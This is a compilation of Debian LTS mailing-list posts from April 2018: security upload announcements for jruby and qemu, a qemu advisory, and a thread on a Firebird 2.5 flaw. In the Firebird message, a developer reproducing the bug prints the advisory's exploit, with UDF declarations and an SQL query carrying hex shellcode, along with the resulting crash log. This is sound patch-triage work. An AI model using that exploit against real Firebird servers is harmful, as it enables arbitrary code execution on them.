Accepted jruby 1.5.6-5+deb7u2 (source all) into oldoldstable
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Tue, 17 Apr 2018 22:32:31 +0200 Source: jruby Binary: jruby Architecture: source all Version: 1.5.6-5+deb7u2 Distribution: wheezy-security Urgency: high Maintainer: Debian Java MaintainersChanged-By: Markus Koschany Description: jruby - 100% pure-Java implementation of Ruby Changes: jruby (1.5.6-5+deb7u2) wheezy-security; urgency=high . * Non-maintainer upload by the LTS team. * Fix CVE-2018-174: possible Unsafe Object Deserialization Vulnerability in gem owner. * Build with OpenJDK 6 to avoid a FTBFS with Java 7. Checksums-Sha1: 46f2a404de67094efbabde7a836a8e3a395870bf 2466 jruby_1.5.6-5+deb7u2.dsc 54e19e1354357ff79b8e9e03c5d461981a5ae03c 30344 jruby_1.5.6-5+deb7u2.debian.tar.xz c9f31c0fab1a2b23b2237e8821d60aa9c6e3b112 8918996 jruby_1.5.6-5+deb7u2_all.deb Checksums-Sha256: 5c291e934d2af8d4175e9c226064f3596bbff41de199cad5b78f6c4a0d33cb93 2466 jruby_1.5.6-5+deb7u2.dsc acd0e580f23eae1bd0e466a018bfc0730cca14b6866e0112aeaf279365837985 30344 jruby_1.5.6-5+deb7u2.debian.tar.xz 5e1da14cf18ba241c1c4e0e92a0b2c1075932d717e21a647cfcd79337e042110 8918996 jruby_1.5.6-5+deb7u2_all.deb Files: eac60b647c44f712953ce57575cafda9 2466 ruby optional jruby_1.5.6-5+deb7u2.dsc 55c86f3dfb2330f4ab85eec1c0802bdc 30344 ruby optional jruby_1.5.6-5+deb7u2.debian.tar.xz 2731873078d5e5f18279d8e355ee473a 8918996 ruby optional jruby_1.5.6-5+deb7u2_all.deb -BEGIN PGP SIGNATURE- iQKjBAEBCgCNFiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAlrWaW9fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQPHGFwb0BkZWJp YW4ub3JnAAoJENmtFLlRO1HkgrUP/3Xljp7fNxLuAJ5W9roI+YbGw6ykQKr4Gbq1 WpJeW4s5zL3n2HdcatZxWuP8geyzx6INcKCnm6PCHw3YbMh7bPSecEA8b2uNtr4G YSrU6Dec3QNwF79+G6PS4WOjfq3CNGrI6TfNl7C2jtdqCMoMHAETOlfV0naFdgS/ uA4TKExK4o9+07rnRg/dU0/c6nyahU0gIQsKrXtheJ+SxVPYItmwaBRfbh+GP7t2 tZqUF6AR2wJ3ilaG5nBS0TSJdOqwCG3qK7kh3XXqTuNJLEmjt+HpDljVSPcN5ezc a5KcWJ6UB+B/Uce2PnS+qymvDIpIGy+w6HaMQDUhrraPrpt2yiTXoLaeh2kafvmQ gL6Cc6IhYoo6peNI9w/h8AIknokOldw+Lzbek0J6y73AKb8frh0HvZCZCIEZyiiq 9O6Cn1pkBHdPLfok1PAWmzLpx+98H1jOjgQGnIy4+aIgYJnCdqW33gb40hxxVuRV xsybevUxzmH7ViCQ4SLPNK5mESqOPyBKJFw3vXSF7zOnO+pqcPywXoL8Tx810N+D TzSXt6vXo85rnTg4ahkjpohB7oUTfpAXLGhDbqb0ZiYrujnhIzg1Ugp9PgLoPspD 59rwK0E8Q7OoVMpoea0b57+Gx8nCP3KwlytL2DPruc7rRBZhkwsjkKCOG5dLUh02 njs/0rd+ =/5gp -END PGP SIGNATURE-
Re: Wheezy update of firebird2.5?
-=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=- > I don't quite know where to go from here. I was somewhat hoping that > Wheezy would be magically not vulnerable to this issue, but obviously, > there's something wrong here that should probably be fixed. The only fix upstream has is to disable UDFs in firebird.conf -- https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch (probebly needs adaptation for firebird2.5, but you get the idea). -- dam
Re: Wheezy update of firebird2.5?
On 2018-04-04 19:54:14, Damyan Ivanov wrote: > -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=- >> Dear maintainer(s), >> >> The Debian LTS team would like to fix the security issues which are >> currently open in the Wheezy version of firebird2.5: >> https://security-tracker.debian.org/tracker/source-package/firebird2.5 >> >> Would you like to take care of this yourself? > > Sorry, no. > > AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the > security team advised against updating that for stable, and the issue > is still open in unstable. > > According to the researchers discovering it, upstream refused to fix > it :( so the only "fix" I am aware of is the change in the default > config to disable the vulnerable functionality. You can find the patch > for firebird3.0 at > https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698 > > It is perhaps not directly applicable to firebid2.5, but should help > regardless. I tried digging into this issue a little further, and couldn't get far. I always have this hurdle to just setup a test environment with Firebird, so I figured I would share the procedure here for the future, so that I wouldn't have to rebuild this from scratch every time. 1. install the database and packages: apt-get install firebird2.5-examples firebird2.5-dev firebird2.5-superclassic 2. set a admin password and configure the server: dpkg-reconfigure firebird2.5-superclassic 3. deploy a test database: gunzip -c /usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > /var/lib/firebird/2.5/data/employee.fdb chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb 4. connect to the database, in a `isql-fb` prompt: SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 'SYSDBA' password 'password'; Then you can do stuff like `SHOW TABLES` and so on. In particular, I have tried to reproduce the issue and I can confirm I can create two external functions with the same ENTRY_POINT, although the second snippet in the advisory has two `DECLARE` statements which I assume is a typo: DECLARE EXTERNAL FUNCTION string2blob VARCHAR(300) BY DESCRIPTOR, BLOB RETURNS PARAMETER 2 ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf' DECLARE EXTERNAL FUNCTION a6 VARCHAR(300) BY DESCRIPTOR, VARCHAR(400) BY DESCRIPTOR RETURNS INTEGER ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf' The actual query to trigger arbitrary code execution seems to fail, however: SQL> select a6((select x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7' from rdb$database), (select x'C8FD8503' from rdb$database)) from rdb$databaseStatement failed, SQLSTATE = 08006 Unable to complete network request to host "localhost". -Error writing data to the connection. Considering it was crafted to start `CALC.EXE` in Windows, that might be expected. We do see a segfault in the logs however: wheezy Tue Apr 17 16:49:56 2018 The user defined function: A6 referencing entrypoint: string2blob in module: fbudf caused the fatal exception: Segmentation Fault. The code attempted to access memory without privilege to do so. This exception will cause the Firebird server to terminate abnormally. ... which is probably a bad sign. I don't quite know where to go from here. I was somewhat hoping that Wheezy would be magically not vulnerable to this issue, but obviously, there's something wrong here that should probably be fixed. A. -- Every time I see an adult on a bicycle I no longer despair for the future of the human race. - H. G. Wells
Re: ruby1.9.1 test packages for wheezy
Also, after talking with my old colleagues, I just realized that they might be using Ruby 1.8 and not 1.9.1. It seems we have triaged those out of the picture, but maybe all 1.8 packages are affected by a bunch of those issues too? This looks suspiciously sparse: https://security-tracker.debian.org/tracker/source-package/ruby1.8 ... when compared to the larger: https://security-tracker.debian.org/tracker/source-package/ruby1.9.1 I feel it's quite possible we have forgotten a bunch of CVEs in Ruby 1.8, is it possible? A.
[SECURITY] [DLA 1351-1] qemu security update
Package: qemu Version: 1.1.2+dfsg-6+deb7u25 CVE ID : CVE-2018-7550 Debian Bug : 892041 The load_multiboot function in hw/i386/multiboot.c in Quick Emulator (aka QEMU) allows local guest OS users to execute arbitrary code on the QEMU host via a mh_load_end_addr value greater than mh_bss_end_addr, which triggers an out-of-bounds read or write memory access. For Debian 7 "Wheezy", these problems have been fixed in version 1.1.2+dfsg-6+deb7u25. We recommend that you upgrade your qemu packages. Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS signature.asc Description: PGP signature
Accepted qemu 1.1.2+dfsg-6+deb7u25 (source all amd64) into oldoldstable
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Tue, 17 Apr 2018 09:30:00 -0400 Source: qemu Binary: qemu qemu-keymaps qemu-system qemu-user qemu-user-static qemu-utils Architecture: source all amd64 Version: 1.1.2+dfsg-6+deb7u25 Distribution: wheezy-security Urgency: medium Maintainer: Debian QEMU TeamChanged-By: Antoine Beaupré Description: qemu - fast processor emulator qemu-keymaps - QEMU keyboard maps qemu-system - QEMU full system emulation binaries qemu-user - QEMU user mode emulation binaries qemu-user-static - QEMU user mode emulation binaries (static version) qemu-utils - QEMU utilities Closes: 892041 Changes: qemu (1.1.2+dfsg-6+deb7u25) wheezy-security; urgency=medium . * Non-maintainer upload by the LTS Security Team. * CVE-2018-7550: fix host arbitrary code execution in mutliboot (Closes: #892041) Checksums-Sha1: 1dd053d9687e5e6d9778fbee132f5428c12d0677 2634 qemu_1.1.2+dfsg-6+deb7u25.dsc 92d1136d288087dfd8f3da4398c088831ffa14c5 198734 qemu_1.1.2+dfsg-6+deb7u25.debian.tar.gz 0d3cb29325b4300bde8ad354984502021d5965ac 53066 qemu-keymaps_1.1.2+dfsg-6+deb7u25_all.deb 2c7cc0256a48b5f419492e089a7a92cd4ebe40aa 121236 qemu_1.1.2+dfsg-6+deb7u25_amd64.deb 42d972e761fbe02c900cf6203afc77d3a2ef6c16 27982434 qemu-system_1.1.2+dfsg-6+deb7u25_amd64.deb 9aabb1cead411f72ba5b05b622f0108319bc11aa 7722094 qemu-user_1.1.2+dfsg-6+deb7u25_amd64.deb 140091e78dc88f3dc4a757e3b1fe3738602537cf 16575624 qemu-user-static_1.1.2+dfsg-6+deb7u25_amd64.deb 994765f6d55b2ca3dfef6a9c4aae4ec4c033302b 666592 qemu-utils_1.1.2+dfsg-6+deb7u25_amd64.deb Checksums-Sha256: b11b71d7b60c0d1a891888b4e4cd5288be2dd95130f840b118356d967d307a86 2634 qemu_1.1.2+dfsg-6+deb7u25.dsc 78e380305dc14928e82e2793a1de8ecca79599fb32b08e7e5f33c176d99efd8f 198734 qemu_1.1.2+dfsg-6+deb7u25.debian.tar.gz a485e4688ad524ce7237e76e389114ef5029c9d36537cd894b7230cdc42ea1fb 53066 qemu-keymaps_1.1.2+dfsg-6+deb7u25_all.deb 47447169367d77ba07189056d0ed4c88646b2624ad2f16bdff87d7936b52d1a4 121236 qemu_1.1.2+dfsg-6+deb7u25_amd64.deb ae150fa11452300e560983cf0606ce29ccaa3ffe1be0f7cfdae35dc22d4eb6f8 27982434 qemu-system_1.1.2+dfsg-6+deb7u25_amd64.deb 4139f08ad386014a4cc082f40a87eb0bfdb47afa0305fb9618ca5f7df7c6b7cf 7722094 qemu-user_1.1.2+dfsg-6+deb7u25_amd64.deb 61f30137fdfc91879cf8ba277b6ddcf3400e601f21adc917296fd049f24aaf9c 16575624 qemu-user-static_1.1.2+dfsg-6+deb7u25_amd64.deb edb3ff74a1bbd654b95e6bdcd6bb7b793726ee5d57a8a6ffac0e8d930fb6d0bc 666592 qemu-utils_1.1.2+dfsg-6+deb7u25_amd64.deb Files: fc202d43c25d565e2c45c9720ec27da5 2634 misc optional qemu_1.1.2+dfsg-6+deb7u25.dsc afe0019a0ef24195b57095ba8e90d368 198734 misc optional qemu_1.1.2+dfsg-6+deb7u25.debian.tar.gz 716be78a8374f141d975e4fac5ccfc28 53066 misc optional qemu-keymaps_1.1.2+dfsg-6+deb7u25_all.deb 62cf25f656cba0d1d6a53ec349693d45 121236 misc optional qemu_1.1.2+dfsg-6+deb7u25_amd64.deb 330623ab1094b33be84cef40f9a547ce 27982434 misc optional qemu-system_1.1.2+dfsg-6+deb7u25_amd64.deb 47ca1eabc268a4adae2e78b1a501e318 7722094 misc optional qemu-user_1.1.2+dfsg-6+deb7u25_amd64.deb db1c76e4e792ae89f63776bd0f26395a 16575624 misc optional qemu-user-static_1.1.2+dfsg-6+deb7u25_amd64.deb d9669f780fd33ede9db839139c54155c 666592 misc optional qemu-utils_1.1.2+dfsg-6+deb7u25_amd64.deb -BEGIN PGP SIGNATURE- iQEzBAEBCAAdFiEEexZCBNCWcjsBljWrPqHd3bJh2XsFAlrWAZMACgkQPqHd3bJh 2XusDAf/XA5SkJgvCn+y+PhAzf+cxbMX3UVmRcyqMZMWo4OzVJsFM9F/8E9Onm+5 wk1dliJ7NTavayv0QW3uWfDuHAfqD3HDKOvzl36lHykHYI7RzND+dbZ+Ka2KLKJt WbPjIHALWEElCgaPz6tlduFQOWyYOjOp2owS9K9Elxcj5yMwNGyiRWWYvbLCUNH1 qUkbma+9HA8cVIsdM1S+G3lx0HRMBZjFuAJikaE9qC/WyFiEeqiu4MzH21TF9D+B 4sjpok1Bnvb/auYMq4nsV7XhtnuhuDpBfvqFETaQGxFlYZZ5qNF8WVrws2q8KEif 5tVlhWePYnpQ2Z2ys7lM1rnS3n+Pew== =106+ -END PGP SIGNATURE-
Accepted qemu-kvm 1.1.2+dfsg-6+deb7u25 (source amd64) into oldoldstable
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Thu, 12 Apr 2018 13:12:27 -0400 Source: qemu-kvm Binary: qemu-kvm qemu-kvm-dbg kvm Architecture: source amd64 Version: 1.1.2+dfsg-6+deb7u25 Distribution: wheezy-security Urgency: medium Maintainer: Michael TokarevChanged-By: Antoine Beaupré Description: kvm- dummy transitional package from kvm to qemu-kvm qemu-kvm - Full virtualization on x86 hardware qemu-kvm-dbg - Debugging info for qemu-kvm Closes: 892041 Changes: qemu-kvm (1.1.2+dfsg-6+deb7u25) wheezy-security; urgency=medium . * Non-maintainer upload by the LTS Security Team. * CVE-2018-7550: fix host arbitrary code execution in mutliboot (Closes: #892041) Checksums-Sha1: f8a02baa0a475af37fd16975d9d4e76e37d936be 2158 qemu-kvm_1.1.2+dfsg-6+deb7u25.dsc 6e5d6bbcec43755e9b39628f2f21a8c014edc9fb 186394 qemu-kvm_1.1.2+dfsg-6+deb7u25.debian.tar.gz 6baa3b4cf33f03ffee73f2e54f4eec0f65588c8a 1698234 qemu-kvm_1.1.2+dfsg-6+deb7u25_amd64.deb 85ed2a6f14c4eab87c872678b768fc83da6a4099 5335138 qemu-kvm-dbg_1.1.2+dfsg-6+deb7u25_amd64.deb 987f9de0963a163d96c9bf74955e18ad70e74d58 26930 kvm_1.1.2+dfsg-6+deb7u25_amd64.deb Checksums-Sha256: acbb264cadf8623f487f45b88ecc8537c8612bce6bb1fcaedfb84f54c753cdc9 2158 qemu-kvm_1.1.2+dfsg-6+deb7u25.dsc 7754b9545b7e9ea46ea803034b97f0d211905825c90716f9e9198c9c79b52b88 186394 qemu-kvm_1.1.2+dfsg-6+deb7u25.debian.tar.gz a694279162b09df62c907ee74d07b435638babeb7c1b4bb2894bcd38a036045e 1698234 qemu-kvm_1.1.2+dfsg-6+deb7u25_amd64.deb 15c34aebc26dc9dfadec5448f26468c92a607150f2ceb1b22545b8fb69a91cda 5335138 qemu-kvm-dbg_1.1.2+dfsg-6+deb7u25_amd64.deb 5cfb9a852e4e978c8ddfe37a251c40c0336fe5edb89a9ed85ad4524800604f56 26930 kvm_1.1.2+dfsg-6+deb7u25_amd64.deb Files: 9df09a787bd0fd9f6ee347dd67d0da7f 2158 misc optional qemu-kvm_1.1.2+dfsg-6+deb7u25.dsc 6f31648b34940c0cc60a576bcffac0f1 186394 misc optional qemu-kvm_1.1.2+dfsg-6+deb7u25.debian.tar.gz 0594765afd3795389a7de36e40e7e37c 1698234 misc optional qemu-kvm_1.1.2+dfsg-6+deb7u25_amd64.deb 608828bcc626c023ac56c61216630f20 5335138 debug extra qemu-kvm-dbg_1.1.2+dfsg-6+deb7u25_amd64.deb 5f8f27eadfbb53f5dec79a1a533709fc 26930 oldlibs extra kvm_1.1.2+dfsg-6+deb7u25_amd64.deb -BEGIN PGP SIGNATURE- iQEzBAEBCAAdFiEEexZCBNCWcjsBljWrPqHd3bJh2XsFAlrV+hUACgkQPqHd3bJh 2XvGAAf/SvZkzqJYiJvJqsSjgqtXIsICVAiyeSn59Y+adU+X/zPWp+7E0z9bEihC Gdl2Z/SMbbz0lDFwg/Y6Eh2L87iE5GFouJ2D9S1t36M45UN8GDdiayyO7iGeVkA4 62aOO7q++YhIoMaPLSGevXfImF9uR6e78qY0TvqikH6nNb0mPrtu2ZGXyDUmi8ut 5OW6y+y4R1hq+8wVSlVwDlXLiVsyiN5JKQsp5EvQGY7j4Q7LmSGnsCYsSdmcwXTU u9Gd1AX9As9LP4V6ryFj13Fm56BfCTVGS7d5fqkgthpqum/H+bufEXbfSC3CQTYb 9pUj+EUZc+FsF6BB1HcTuU068e0b1w== =fBKK -END PGP SIGNATURE-